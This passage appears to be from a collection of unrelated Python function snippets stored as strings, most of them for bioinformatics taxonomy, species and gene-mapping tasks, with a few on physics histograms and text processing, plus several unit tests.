self.rest:\n titles.append(i.title.split(\" \"))\n for i in range(len(titles)):\n for j in range(i, len(titles)):\n if titles[i][0] == titles[j][0] and titles[i][1] == titles[j][1]:\n if \" \".join(titles[i]) not in [z.title for z in self.species[\" \".join(titles[i][:2])]]:\n self.rest[i].species = \" \".join(titles[i])\n self.species[\" \".join(titles[i][:2])].append(self.rest[i])\n if \" \".join(titles[j]) not in [z.title for z in self.species[\" \".join(titles[j][:2])]]:\n self.rest[j].species = \" \".join(titles[j])\n self.species[\" \".join(titles[j][:2])].append(self.rest[j])\n\n self.name_of_species = list(self.species.keys())\n\n for i in self.species.keys():\n self.count_species[i] = len(self.species[i])", "def test_create_gene_ontology(self):\n\n # Here are mappings for just a few yeast genes.\n\n mapping = {}\n mapping['STE7'] = ['GO:0000187']\n mapping['PBS2'] = ['GO:0000187']\n mapping['NOP8'] = [\n 'GO:0003676', 'GO:0003723', 'GO:0042254', 'GO:0005634', 'GO:0005730'\n ]\n\n # Build the ontology, then see if it looks correct.\n\n root = dc.models.tensorgraph.models.ontology.create_gene_ontology(\n mapping, 
min_node_features=1)\n assert len(root.feature_ids) == 0\n\n def find_features(node, features):\n features.update(node.feature_ids)\n for child in node.children:\n find_features(child, features)\n\n all_features = set()\n find_features(root, all_features)\n assert len(all_features) == 3\n for key in mapping:\n assert key in all_features", "def construct_occurrence_dico(data) :\n print('Constructing occurence dictionnaries...')\n\n p_kw_dico = dict()\n kw_p_dico = dict()\n full_stem_dico = {}\n for patent in data :\n patent_id = patent['id']\n #[keywords,stem_dico] = extract_keywords(patent[1]+\". \"+patent[2],patent_id)\n [keywords,stem_dico] = extract_keywords(patent['title']+\". \"+patent['abstract'],patent_id)\n #print(keywords)\n\n for k in keywords :\n # add to p_kw dico\n if k in kw_p_dico :\n kw_p_dico[k].append(patent_id)\n else :\n kw_p_dico[k]= [patent_id]\n #\n if patent_id in p_kw_dico :\n p_kw_dico[patent_id].append(k)\n else :\n p_kw_dico[patent_id] = [k]\n\n for k in stem_dico.keys():\n if k in full_stem_dico :\n full_stem_dico[k]=full_stem_dico[k].union(stem_dico[k])\n else :\n full_stem_dico[k] = stem_dico[k]\n\n return([p_kw_dico,kw_p_dico,full_stem_dico])", "def add_agr_prefix_by_species_taxon(identifier, taxon_id):\n species_dict = {\n 7955: 'ZFIN:',\n 6239: 'WB:',\n 10090: '', # No MGI prefix\n 10116: '', # No RGD prefix\n 559292: 'SGD:',\n 4932: 'SGD:',\n 7227: 'FB:',\n 9606: '', # No HGNC prefix\n 2697049: '' # No SARS-CoV-2 prefix\n }\n\n new_identifier = species_dict[taxon_id] + identifier\n\n return new_identifier", "def network_nodes_species(self):\n G, mapping = self.network()\n waste, resources, intmed_products = self.amenities()\n\n node_dict = {}\n\n for nd in G:\n # print(nd)\n if isinstance(nd, int):\n node_dict[nd] = \"r\"\n elif nd in self.commodity:\n node_dict[nd] = \"Xc\"\n elif nd in waste:\n node_dict[nd] = \"w\"\n elif nd in resources:\n node_dict[nd] = \"Xr\"\n elif nd in intmed_products:\n node_dict[nd] = \"InPr\"\n\n return node_dict", "def stats_orgs(df, new_data=False):\n rows = []\n\n if new_data:\n df = df[df.index.isin(in_taxa_dict.keys())]\n else:\n df = df[df.index.isin(db_taxa_dict.keys())]\n\n df2 = df.copy()\n df2[df2 >= 1] = 1\n\n df = df.sum(axis=1).to_frame()\n\n if new_data:\n df[f\"Genes out of {len(matrix.columns)}\"] = df2.sum(axis=1).to_frame()\n df = df.rename(columns={0: f\"Sequences Collected\"})\n\n else:\n df = df.rename(columns={0: f\"Genes out of {len(matrix.columns)}\"})\n\n # Fill in taxonomic information\n if new_data:\n list_of_dicts = [{key: value[i] for key, value in in_taxa_dict.items()} for i in range(3)]\n else:\n list_of_dicts = [{key: value[i] for key, value in db_taxa_dict.items()} for i in range(3)]\n df['Long Name'] = df.index.map(list_of_dicts[2])\n df['Higher Taxonomy'] = df.index.map(list_of_dicts[0])\n df['Lower Taxonomy'] = df.index.map(list_of_dicts[1])\n\n # Rearrange Columns to Put Genes after taxa stats\n cols = df.columns.tolist()\n cols = cols[2:] + cols[:2]\n df = df[cols]\n\n if new_data:\n routes_dict = get_routes()\n list_of_routes_dicts = [{key: value[i] for key, value in routes_dict.items()} for i in range(3)]\n df[\"#SBH\"] = df.index.map(list_of_routes_dicts[0])\n df[\"#BBH\"] = df.index.map(list_of_routes_dicts[1])\n df[\"#HMM\"] = df.index.map(list_of_routes_dicts[2])\n out_filename = 'new_taxa_stats.tsv'\n else:\n out_filename = 'db_taxa_stats.tsv'\n\n # Fill in columns for including in SGT construction. 
By default all are yes\n has_paralogs = check_paralogs()\n if new_data:\n sgt_dict = {org: 'yes' for org in in_taxa_dict.keys()}\n else:\n sgt_dict = {org: 'yes' for org in db_taxa_dict.keys()}\n df['SGT'] = df.index.map(sgt_dict)\n\n # Fill in column for paralogs. If no paralogs entry is 'none'.\n # If there are paralogs entry is 'yes'. If there are paralogs, but --ortholog_only is given entry is 'no'.\n if new_data:\n pass\n else:\n paralogs_dict = {org: ('yes' if org in has_paralogs and not args.orthologs_only\n else 'no' if org in has_paralogs and args.orthologs_only else 'none')\n for org in db_taxa_dict}\n df['Paralogs'] = df.index.map(paralogs_dict)\n\n df = df.rename_axis('Unique ID')\n df.to_csv(f'{output_fold}/{out_filename}', sep='\\t')", "def hierachy_nomenclature(a2_data):\n ret_dic = OrderedDict()\n ret_dic['X'] = OrderedDict()\n ret_dic['X']['name'] = a2_data['xs'].keys()\n ret_dic['X']['N'] = len(a2_data['xs'].keys())\n ret_dic['I'] = OrderedDict()\n ret_dic['I']['name'] = a2_data['xs']['1'].keys()\n ret_dic['I']['N'] = len(a2_data['xs']['1'].keys())\n ret_dic['R'] = OrderedDict()\n ret_dic['R']['name'] = a2_data['xs']['1']['U235'].keys()\n ret_dic['R']['N'] = len(a2_data['xs']['1']['U235'].keys())\n ret_dic['G'] = OrderedDict()\n ret_dic['G']['name'] = a2_data['xs']['1']['U235']['abso'].keys()\n ret_dic['G']['N'] = len(a2_data['xs']['1']['U235']['abso'].keys())\n return ret_dic", "def mk_json_ions(dlas, prefix, outfil):\n # Sort\n ra = dlas.coord.ra.degree[0]\n srt = np.argsort(np.array(ra))\n\n all_ions = {}\n # Loop on DLA\n for jj, isrt in enumerate(srt):\n idla = dlas._abs_sys[isrt]\n # Astropy Table\n ion_tab = idla._ionN\n # Convert key to standard names\n new_dict = {}\n for row in ion_tab:\n Zion = (row['Z'], row['ion'])\n # Skip HI\n if Zion == (1,1):\n continue\n # Get name\n new_key = ltai.ion_name(Zion)\n # Fine structure?\n if row['Ej'] > 0.:\n new_key = new_key+'*'\n new_dict[new_key] = dict(zip(row.dtype.names, row))\n # Write to all_ions\n name = survey_name(prefix, idla)\n all_ions[name] = new_dict\n\n # Write\n print('Writing {:s}'.format(outfil))\n with io.open(outfil, 'w', encoding='utf-8') as f:\n f.write(unicode(json.dumps(all_ions, sort_keys=True, indent=4,\n separators=(',', ': '))))\n\n # Return\n return all_ions", "def gethists():\n histdict = {}\n\n lept_type = ['elect', 'muon']\n\n for lept in lept_type:\n histdict[\"h_misE_{}\".format(lept)] = TH1F('h_misE_{}'.format(lept), 'Gen/Reco missing energy comparison', 200, -70, 40)\n histdict[\"h_misPx_{}\".format(lept)] = TH1F('h_misPx_{}'.format(lept), 'Gen/Reco missing Px comparison', 200, -40, 40)\n histdict[\"h_misPy_{}\".format(lept)] = TH1F('h_misPy_{}'.format(lept), 'Gen/Reco missing Py comparison', 200, -40, 40)\n histdict[\"h_misPz_{}\".format(lept)] = TH1F('h_misPz_{}'.format(lept), 'Gen/Reco missing Pz comparison', 200, -50, 50)\n histdict[\"h_misP_{}\".format(lept)] = TH1F('h_misP_{}'.format(lept), 'Gen/Reco missing position comparison', 200, -30, 30)\n histdict[\"h_misM_{}\".format(lept)] = TH1F(\"h_misM_{}\".format(lept), 'Gen/Reco missing mass comparison', 200, -150, 50)\n histdict[\"h_leptE_{}\".format(lept)] = TH1F(\"h_leptE_{}\".format(lept), 'Gen/Reco lepton energy comparison', 200, -5, 5)\n histdict[\"h_leptTheta_{}\".format(lept)] = TH1F(\"h_leptTheta_{}\".format(lept), 'Gen theta lepton', 200, -5, 5)\n\n histdict[\"h_recoJetsAngle\"] = TH1F(\"h_recoJetsAngle\", 'Angle between the two reconstructed jets', 200, 0, 3.5)\n histdict[\"h_recoJetsTheta\"] = TH1F(\"h_recoJetsTheta\", 
'Theta angles of the reconstructed jets', 200, -3.5, 3.5)\n histdict[\"h_recoJetEnergy\"] = TH1F(\"h_recoJetEnergy\", 'Energy of the reconstructed jets', 200, 0, 200)\n\n with_wo = ['FSR', 'woFSR']\n\n # for cut in with_wo:\n # histdict[\"h_ISR_E{}\".format(cut)] = TH1F(\"h_ISR_E{}\".format(cut), 'ISR energy', 200, -0, 150)\n # histdict[\"h_ISR_Theta{}\".format(cut)] = TH1F(\"h_ISR_Theta{}\".format(cut), 'ISR theta', 200, -1.6, 1.6)\n # histdict[\"h_ISR_pz{}\".format(cut)] = TH1F(\"h_ISR_pz{}\".format(cut), 'ISR pz', 200, -10, 10)\n\n # histdict[\"h_ISR_Theta_vs_E{}\".format(cut)] = TH2F(\"h_ISR_Theta_vs_E{}\".format(cut), 'ISR theta versus energy', 750, 0, 150, 200, -1.7, 1.7)\n # histdict[\"h_FSR_Theta_vs_E{}\".format(cut)] = TH2F(\"h_FSR_Theta_vs_E{}\".format(cut), 'FSR theta versus energy', 750, 0, 150, 200, -1.7, 1.7)\n\n histdict[\"h_FSR_E\"] = TH1F(\"h_FSR_E\", 'FSR energy', 200, -1, 5)\n histdict[\"h_FSR_Theta\"] = TH1F(\"h_FSR_Theta\", 'FSR theta', 200, -1.6, 1.6)\n histdict[\"h_FSR_pz\"] = TH1F(\"h_FSR_pz\", 'FSR pz', 200, -10, 10)\n\n # histdict[\"h_FSR_E_electrons\"] = TH1F(\"h_FSR_E_electrons\", 'energy FSR emitted by electrons', 200, -1, 5)\n # histdict[\"h_FSR_Theta_electrons\"] = TH1F(\"h_FSR_Theta_electrons\", 'theta FSR emited by the electrons', 200, -1.6, 1.6)\n # histdict[\"h_FSR_pz_electrons\"] = TH1F(\"h_FSR_pz_electrons\", 'pz FSR emited by the electrons ', 200, -10, 10)\n\n # histdict[\"h_FSR_E_muons\"] = TH1F(\"h_FSR_E_muons\", 'energy FSR emitted by muons', 200, -1, 5)\n # histdict[\"h_FSR_Theta_muons\"] = TH1F(\"h_FSR_Theta_muons\", 'theta FSR emited by the muons', 200, -1.6, 1.6)\n # histdict[\"h_FSR_pz_muons\"] = TH1F(\"h_FSR_pz_muons\", 'pz FSR emited by the muons ', 200, -10, 10)\n\n histdict[\"h_FSR_lepton_angle_vs_E\"] = TH2F(\"h_FSR_lepton_angle_vs_E\", 'Solid angle between the FSR photon and the lepton', 150, -1, 10, 150, 0, 3.17)\n histdict[\"h_E_p_vs_E_FSR\"] = TH2F(\"h_E_p_vs_E_FSRPhoton\", \"E/p ratio versus the FSR energy photon\", 220, -1, 10, 220, 0.9998, 1.0002)\n\n\n histdict[\"h_nonFSR_lepton_angle_vs_E\"] = TH2F(\"h_photons_lepton_angle_vs_E\", 'Solid angle between the non-FSR photons and the lepton', 150, -1, 10, 150, 0, 3.17)\n histdict[\"h_E_p_vs_E_nonFSR\"] = TH2F(\"h_E_p_vs_E_NonFSRPhoton\", \"E/p ratio versus the non-FSR energy photon\", 220, -1, 10, 220, 0.9998, 1.0002)\n\n histdict[\"h_test\"] = TH2F(\"h_test\", \"h_test\", 150, -1, 10, 150, 0, 3.17)\n return histdict", "def get_node_a(name, taxid, pathway, topology, psi_mi_to_sql_object):\n\n # Testing if the node is already in the database\n node_dict = psi_mi_to_sql_object.get_node(name, node_tax_id=taxid)\n\n if not node_dict:\n node_dict = {\n \"name\" : 'Uniprot:' + name,\n \"tax_id\": taxid,\n \"alt_accession\": None,\n 'pathways': pathway,\n \"aliases\": None,\n \"topology\": topology\n }\n\n return node_dict", "def test_make_otu_table_taxonomy(self):\r\n otu_map_lines = \"\"\"0\tABC_0\tDEF_1\r\n1\tABC_1\r\nx\tGHI_2\tGHI_3\tGHI_77\r\nz\tDEF_3\tXYZ_1\"\"\".split('\\n')\r\n taxonomy = {'0': ['Bacteria', 'Firmicutes'],\r\n 'x': ['Bacteria', 'Bacteroidetes']}\r\n obs = make_otu_table(\r\n otu_map_lines,\r\n taxonomy,\r\n constructor=DenseOTUTable)\r\n exp = \"\"\"{\"rows\": [{\"id\": \"0\", \"metadata\": {\"taxonomy\": [\"Bacteria\", \"Firmicutes\"]}}, {\"id\": \"1\", \"metadata\": {\"taxonomy\": [\"None\"]}}, {\"id\": \"x\", \"metadata\": {\"taxonomy\": [\"Bacteria\", \"Bacteroidetes\"]}}, {\"id\": \"z\", \"metadata\": {\"taxonomy\": [\"None\"]}}], \"format\": \"Biological 
Observation Matrix 0.9dev\", \"data\": [[1.0, 1.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.0, 0.0], [0.0, 1.0, 0.0, 1.0]], \"columns\": [{\"id\": \"ABC\", \"metadata\": null}, {\"id\": \"DEF\", \"metadata\": null}, {\"id\": \"GHI\", \"metadata\": null}, {\"id\": \"XYZ\", \"metadata\": null}], \"generated_by\": \"QIIME 1.4.0-dev, svn revision 2532\", \"matrix_type\": \"dense\", \"shape\": [4, 4], \"format_url\": \"http://biom-format.org\", \"date\": \"2011-12-21T00:19:30.961477\", \"type\": \"OTU table\", \"id\": null, \"matrix_element_type\": \"float\"}\"\"\"\r\n self.assertEqual(\r\n parse_biom_table(obs.split('\\n')),\r\n parse_biom_table(exp.split('\\n')))", "def generate_dictionary(self, lexicon):\n dictionary = {}\n for category, data in lexicon.iteritems():\n for form, gloss in data:\n dictionary.setdefault(form, []).append((gloss, category))\n return dictionary", "def _species(self, hdr):\n # Called PolyAtomic in OpenMIMS source\n d = {}\n\n d['numeric flag'], d['numeric value'], d['elements'], \\\n d['charges'], d['charge label'], d['label'] = \\\n unpack(self._bo + '4i c 64s', hdr.read(81))\n\n d['label'] = self._cleanup_string(d['label'])\n d['charge label'] = self._cleanup_string(d['charge label'])\n\n # OpenMIMS says 3 bytes AFTER el.table are unused; this is wrong,\n # 3 bytes BEFORE el.table (b 81-84) are unused. n_elements (here:\n # atomic number) is element number in periodic table rather than\n # number of elements. n_isotopes (here: isotope number) is offset from\n # main atomic Z number. Also: collapse ElementTable (Tabelts) into\n # main dict, too many layers.\n hdr.seek(3, 1)\n atoms = unpack(self._bo + '15i', hdr.read(60))\n d['atomic number'] = tuple(n for n in atoms[::3])\n d['isotope number'] = tuple(n for n in atoms[1::3])\n d['stoich number'] = tuple(n for n in atoms[2::3])\n return d", "def _get_all_oshapes(self):\n an_iname = self.node_list[0]\n an_inode = self.builder.nodes[an_iname]\n an_ishape = an_inode.oshapes['loc']\n \n return {'main' : an_ishape,\n 'loc' : an_ishape,\n 'cov' : an_ishape + [an_ishape[-1]]}", "def make_consensus_taxonomy(dict_taxs):\n dict_consensus = {}\n for read_id in dict_taxs:\n hits = dict_taxs[read_id]['hits']\n taxonomy = dict_taxs[read_id]['taxonomy']\n first_taxonomy = taxonomy[0] # take first taxonomy list of the list, will be used to fill tax fields\n length_taxonomy = len(first_taxonomy)\n if hits == 1: # only one taxonomy, no problem here\n dict_consensus[read_id] = first_taxonomy\n elif hits > 1: # more than one hit, a consensus has to be reached\n dict_consensus[read_id] = [] # open empty list, it will be filled after\n check_list = [] # list to store the output of tax comparisons\n for taxs in zip(*taxonomy): # create an iterable that gives all entries for each position of the taxonomy lists\n check = len(set(taxs)) == 1 # if the iterable is length 1, all taxs agree. If it's larger, there's not an agreement\n check_list.append(check) # append comparison results to previosuly opened list\n try:\n first_true = check_list.index(True) # look for first position where there is a True\n if first_true != 0:\n dict_consensus[read_id].extend(first_true * ['NA']) # add as many NA's as Falses are before first True\n dict_consensus[read_id].extend(first_taxonomy[first_true:]) # from first True on, add the taxonomy\n else: # if first true is 0, taxs should be exactly the same\n dict_consensus[read_id] = first_taxonomy\n except ValueError: # it fires when there's not a single True, so there's no consensus. 
The read is totally ambiguous\n dict_consensus[read_id].extend(length_taxonomy*['NA'])\n total_reads = len(dict_consensus)\n return dict_consensus, length_taxonomy, total_reads", "def taxonomy_plot(self,seasons):\n print('Formatting data.')\n no_of_ideograms=self.taxonomy_files()\n location=self.place.capitalize()+'-'+str(self.year)\n if seasons==True:\n seasons=self.weather.seasons(self.place)\n print('Done')\n self.conf.taxo_conf(no_of_ideograms, location, self.start_level, self.plot_level, seasons)", "def make_global_state(self, shreds_tags):\n doc_counts = collections.defaultdict(int)\n\n for doc, tags in shreds_tags.items():\n for tag in tags:\n doc_counts[tag] += 1\n\n num_docs = float(len(shreds_tags))\n\n idf = {}\n for tag, count in doc_counts.items():\n idf[tag] = math.log(num_docs / count)\n return {\n 'idf_map': idf,\n 'all_terms': sorted(idf.keys()),\n }", "def initialize_output_dict(self, label: Optional[str] = None):\n if label is not None or not self._does_output_dict_contain_info():\n for species in self.species_list:\n if label is None or species.label == label:\n if species.label not in self.output:\n self.output[species.label] = dict()\n if 'paths' not in self.output[species.label]:\n self.output[species.label]['paths'] = dict()\n path_keys = ['geo', 'freq', 'sp', 'composite']\n for key in path_keys:\n if key not in self.output[species.label]['paths']:\n self.output[species.label]['paths'][key] = ''\n if 'irc' not in self.output[species.label]['paths'] and species.is_ts:\n self.output[species.label]['paths']['irc'] = list()\n if 'job_types' not in self.output[species.label]:\n self.output[species.label]['job_types'] = dict()\n for job_type in list(set(self.job_types.keys())) + ['opt', 'freq', 'sp', 'composite', 'onedmin']:\n if job_type in ['rotors', 'bde']:\n # rotors could be invalidated due to many reasons,\n # also could be falsely identified in a species that has no torsional modes.\n self.output[species.label]['job_types'][job_type] = True\n else:\n self.output[species.label]['job_types'][job_type] = False\n keys = ['conformers', 'isomorphism', 'convergence', 'restart', 'errors', 'warnings', 'info']\n for key in keys:\n if key not in self.output[species.label]:\n if key == 'convergence':\n self.output[species.label][key] = None\n else:\n self.output[species.label][key] = ''", "def reindex_subcomponent_taxa(self):\n ti_mutable = self.taxon_set._is_mutable\n self.taxon_set._is_mutable = True\n new_map = CharacterDataMap()\n for taxon, seq in self.taxon_seq_map.items():\n taxon = self.taxon_set.require_taxon(label=taxon.label)\n new_map[taxon] = seq\n self.taxon_set._is_mutable = ti_mutable\n self.taxon_seq_map = new_map", "def nsrGenera(taxonList, synonymList):\r\n species = list(filter(None, sorted(taxonList + synonymList)))\r\n generaList = [i.split()[0] for i in species]\r\n generaList = list(dict.fromkeys(generaList))\r\n return generaList", "def read_from_tree(self, tree, warnings=True):\n\n if isinstance(tree, str):\n tree = dendropy.Tree.get_from_path(tree,\n schema='newick',\n rooting=\"force-rooted\",\n preserve_underscores=True)\n\n taxonomy = {}\n for leaf in tree.leaf_node_iter():\n taxa = []\n\n node = leaf.parent_node\n while node:\n if node.label:\n taxa_str = node.label\n if ':' in taxa_str:\n taxa_str = taxa_str.split(':')[1]\n\n if not is_float(taxa_str):\n if taxa_str[-1] == ';':\n taxa_str = taxa_str[:-1]\n\n # check for concatenated ranks of the form: p__Crenarchaeota__c__Thermoprotei\n for prefix in Taxonomy.rank_prefixes:\n split_str = '__' + 
prefix\n if split_str in taxa_str:\n taxa_str = taxa_str.replace(split_str, ';' + prefix)\n\n # appears to be an internal label and not simply a support value\n taxa = [x.strip() for x in taxa_str.split(';')] + taxa\n node = node.parent_node\n\n if warnings and len(taxa) > 7:\n self.logger.warning(\n 'Invalid taxonomy string read from tree for taxon %s: %s' % (leaf.taxon.label, ';'.join(taxa)))\n\n # check if genus name should be appended to species label\n if len(taxa) == 7:\n genus = taxa[5][3:]\n species = taxa[6][3:]\n if genus not in species and len(species.split()) == 1:\n taxa[6] = 's__' + genus + ' ' + species\n\n taxa = self.fill_trailing_ranks(taxa)\n taxonomy[leaf.taxon.label] = taxa\n\n return taxonomy", "def create_from_reactome_mapping(mappings: str, species: str = \"Homo sapiens\"):\n pathways = dict()\n pathway_names = dict()\n\n mapping_lines = mappings.split(\"\\n\")\n\n for mapping in mapping_lines:\n mapping = mapping.strip()\n\n # ignore empty lines\n if len(mapping) == 0:\n continue\n\n fields = mapping.split(\"\\t\")\n\n if len(fields) < 6:\n raise SyntaxError(\"Invalid mapping specification passed. Must contain at least 6 fields.\")\n\n molecule_id = fields[0]\n pathway_id = fields[1]\n pathway_name = fields[3]\n pathway_species = fields[5]\n\n if pathway_species != species:\n continue\n\n if pathway_id not in pathways:\n pathways[pathway_id] = set()\n pathway_names[pathway_id] = pathway_name\n\n pathways[pathway_id].add(molecule_id)\n\n # create the GeneSet object\n return GeneSet(gene_sets=pathways, gene_set_names=pathway_names)", "def fetch_by_id(self, taxon):\n res = self.ensembl.get_taxonomy_by_id(taxon)\n return res", "def _parse_id_to_taxonomy_file(f):\r\n result = {}\r\n for line in f:\r\n line = line.strip()\r\n if line:\r\n identifier, taxonomy = map(strip, line.split('\\t'))\r\n result[identifier] = taxonomy\r\n return result", "def parse_orthologs(self):\n counted_orthologs = {}\n for file in glob(f'{self.ortholog_folder}/*.fas'):\n for record in SeqIO.parse(file, 'fasta'):\n if record.description not in counted_orthologs:\n counted_orthologs[record.description] = 1\n else:\n counted_orthologs[record.description] += 1\n return counted_orthologs", "def createEmptyMapData():\n with open('data/taxzone.json', 'r') as f:\n taxzones = json.load(f)\n\n polygons_shape = [shape(feature['geometry']) for feature in taxzones['features']]\n names = [feature['properties']['id'] for feature in taxzones['features']]\n map_data = pd.DataFrame({'poly': polygons_shape, 'id': names})\n\n return map_data", "def build_tree(self, genes_share_one_alignment):\r\n species_name = self.species\r\n fun_built_tree = getattr(SSTree, species_name)\r\n return fun_built_tree(genes_share_one_alignment)", "def _get_hists(ds):\n hists = {}\n for name, ds in ds.items():\n try:\n hists[name] = Hist(ds)\n except HistError:\n hists[name] = _get_hists(ds)\n return hists", "def extract_tax_ids_from_species(species_file):\n\n tax_ids = {}\n seen_ga = False\n\n fp = open(species_file, 'r')\n\n for line in fp:\n # if not a comment line\n if line[0] != '#' and not seen_ga:\n line = line.strip().split()\n\n if line[3] not in tax_ids:\n if line[5] != '-':\n tax_ids[line[3]] = int(line[5])\n\n elif line.find(\"CURRENT GA THRESHOLD:\") != -1:\n seen_ga = True\n\n fp.close()\n\n return tax_ids", "def test_make_compatible_taxa_summaries_sample_id_map(self):\r\n exp = ((['Even7', 'Even8'], ['Eukarya'], array([[1., 1.]])),\r\n (['Even1', 'Even2'], ['Eukarya'], array([[0.5, 0.6]])))\r\n obs = 
_make_compatible_taxa_summaries(self.taxa_summary3,\r\n self.taxa_summary4, self.sample_id_map1)\r\n self.compare_multiple_level_array(obs, exp)", "def serotype_escherichia(metadata, analysistype):\n for sample in metadata:\n # Initialise negative results to be overwritten when necessary\n sample[analysistype].best_o_pid = '-'\n sample[analysistype].o_genes = ['-']\n sample[analysistype].o_set = ['-']\n sample[analysistype].best_h_pid = '-'\n sample[analysistype].h_genes = ['-']\n sample[analysistype].h_set = ['-']\n if sample.general.bestassemblyfile != 'NA':\n if sample.general.closestrefseqgenus in ['Escherichia', 'Shigella']:\n o = dict()\n h = dict()\n for result, percentid in sample[analysistype].blastresults.items():\n if 'O' in result.split('_')[-1]:\n o.update({result: float(percentid)})\n if 'H' in result.split('_')[-1]:\n h.update({result: float(percentid)})\n # O\n try:\n sorted_o = sorted(o.items(), key=operator.itemgetter(1), reverse=True)\n sample[analysistype].best_o_pid = str(sorted_o[0][1])\n\n sample[analysistype].o_genes = [gene for gene, pid in o.items()\n if str(pid) == sample[analysistype].best_o_pid]\n sample[analysistype].o_set = \\\n list(set(gene.split('_')[-1] for gene in sample[analysistype].o_genes))\n except (KeyError, IndexError):\n pass\n # H\n try:\n sorted_h = sorted(h.items(), key=operator.itemgetter(1), reverse=True)\n sample[analysistype].best_h_pid = str(sorted_h[0][1])\n sample[analysistype].h_genes = [gene for gene, pid in h.items()\n if str(pid) == sample[analysistype].best_h_pid]\n sample[analysistype].h_set = \\\n list(set(gene.split('_')[-1] for gene in sample[analysistype].h_genes))\n except (KeyError, IndexError):\n pass\n return metadata", "def createSpecies(self):\n return _libsbml.Model_createSpecies(self)", "def get_taxa(taxa_fname, sample_ids):\n try:\n lines = open(taxa_fname, 'U').readlines()\n except (TypeError, IOError):\n raise MissingFileError, 'Taxa summary file required for this analysis'\n map = parse_mapping_file(lines)\n return map", "def init_gene():\n gene_details=dict(\n id = '', \n anno_id = [],\n confgenes_id = [],\n name = '',\n source = '',\n gene_info = {},\n alias = '',\n name2 = [],\n strand = '',\n chr = '',\n chr_num = [],\n paralogs = [],\n start = '',\n stop = '',\n transcripts = [],\n transcript_info = [],\n transcript_status = [],\n transcript_valid = [],\n exons = [],\n exons_confirmed = [],\n cds_exons = [],\n utr5_exons = [],\n utr3_exons = [],\n tis = [],\n tis_conf = [],\n tis_info = [],\n cdsStop = [],\n cdsStop_conf = [],\n cdsStop_info = [],\n tss = [],\n tss_info = [],\n tss_conf = [],\n cleave = [],\n cleave_info = [],\n cleave_conf = [],\n polya = [],\n polya_info = [],\n polya_conf = [],\n is_alt = [],\n is_alt_spliced = 0,\n is_valid = [],\n transcript_complete = [],\n is_complete = [],\n is_correctly_gff3_referenced = '',\n splicegraph = []\n )\n return gene_details", "def write_taxon_item(tax: TMB_Classes.RankedTaxonClass, ind: str) -> None:\n # starttag, endtag = rank_tags(tax.taxon_rank)\n # outfile.write(ind + \"<li><a href=\\\"#{}\\\">{} {}{}{}</a>\".format(taxon_link(tax), tax.taxon_rank.capitalize(),\n # starttag, tax.name, endtag))\n outfile.write(ind + \"<li>\" + create_taxon_link(tax.taxon_rank, tax.name, do_print, same_page=True) + \"\\n\")\n outfile.write(ind + \" <ul>\\n\")\n if tax.n_children() > 0:\n for cc in sorted(tax.children):\n write_taxon_item(cc, ind + 4 * \" \")\n else:\n ssplist = []\n for ss in specieslist:\n if tax.taxon_rank == \"genus\":\n if ss.genus == tax.name:\n 
ssplist.append(create_species_link(ss.genus, ss.species, do_print, status=ss.status))\n elif tax.taxon_rank == \"subgenus\":\n if ss.subgenus == tax.name:\n ssplist.append(create_species_link(ss.genus, ss.species, do_print, status=ss.status))\n outfile.write(ind + \" <li>\" + \", \".join(ssplist) + \"</li>\\n\")\n outfile.write(ind + \" </ul>\\n\")\n outfile.write(ind + \"</li>\\n\")", "def create_taxon_to_state_set_map(self, char_indices=None):\n taxon_to_state_indices = {}\n for t in self.taxon_seq_map.keys():\n cdv = self[t]\n if char_indices is None:\n ci = range(len(cdv))\n else:\n ci = char_indices\n v = []\n for char_index in ci:\n cell = cdv[char_index]\n cell_value = cell.value\n try:\n state_alphabet = cell.character_type.state_alphabet\n except AttributeError:\n state_alphabet = self.default_state_alphabet\n inds = [state_alphabet.index(i) for i in cell_value.fundamental_states]\n v.append(set(inds))\n taxon_to_state_indices[t] = v\n return taxon_to_state_indices", "def get_taxonomy_results(filepath):\n taxonomy_results = {}\n with open(filepath, \"r\") as f:\n reader = csv.DictReader(f, delimiter=';')\n for row in reader:\n result = row[\"Result\"]\n taxonomy_results.setdefault(result, {})\n taxonomy_results[result][\"description\"] = row[\"Description\"]\n return taxonomy_results", "def test_map_ids_to_taxonomy(self):\r\n p = BlastTaxonAssigner({})\r\n id_to_taxonomy_map = {\r\n \"AY800210\": \"Archaea;Euryarchaeota;Halobacteriales;uncultured\",\r\n \"EU883771\":\r\n \"Archaea;Euryarchaeota;Methanomicrobiales;Methanomicrobium et rel.\",\r\n \"EF503699\": \"Archaea;Crenarchaeota;uncultured;uncultured\",\r\n \"DQ260310\":\r\n \"Archaea;Euryarchaeota;Methanobacteriales;Methanobacterium\",\r\n \"EF503697\": \"Archaea;Crenarchaeota;uncultured;uncultured\",\r\n }\r\n hits = {\r\n 's1': (\"AY800210\", 1e-99),\r\n 's5': (\"EU883771\", 'weird confidence value'),\r\n 's3': (\"DQ260310\", 42.),\r\n 's4': None,\r\n }\r\n expected = {\r\n 's1':\r\n (\"Archaea;Euryarchaeota;Halobacteriales;uncultured\",\r\n 1e-99, \"AY800210\"),\r\n 's5': ('Archaea;Euryarchaeota;Methanomicrobiales;Methanomicrobium et rel.',\r\n 'weird confidence value', \"EU883771\"),\r\n 's3':\r\n (\"Archaea;Euryarchaeota;Methanobacteriales;Methanobacterium\",\r\n 42., \"DQ260310\"),\r\n 's4': ('No blast hit', None, None),\r\n }\r\n actual = p._map_ids_to_taxonomy(hits, id_to_taxonomy_map)\r\n self.assertEqual(actual, expected)", "def testMakeNewSpecies(self):\n\n # adding 3 unique species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().fromSMILES('[OH]'), \n Species().fromSMILES('CC'),\n Species().fromSMILES('[CH3]')]\n\n for spc in spcs:\n cerm.makeNewSpecies(spc)\n\n self.assertEquals(len(cerm.speciesDict), len(spcs)) \n self.assertEquals(len(cerm.indexSpeciesDict), len(spcs))\n\n # adding 3 unique, and 1 already existing species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().fromSMILES('[OH]'), \n Species().fromSMILES('CC'),\n Species().fromSMILES('[CH3]'),\n Species().fromSMILES('CC')]#duplicate species\n\n for spc in spcs:\n cerm.makeNewSpecies(spc)\n\n self.assertEquals(len(cerm.speciesDict), len(spcs) - 1) \n self.assertEquals(len(cerm.indexSpeciesDict), len(spcs) - 1)", "def test_write_add_taxa_summary_mapping(self):\r\n write_add_taxa_summary_mapping(self.add_taxa_summary,\r\n self.add_taxa_order,\r\n self.add_taxa_mapping,\r\n self.add_taxa_header,\r\n self.tmp_fp1)\r\n obs = 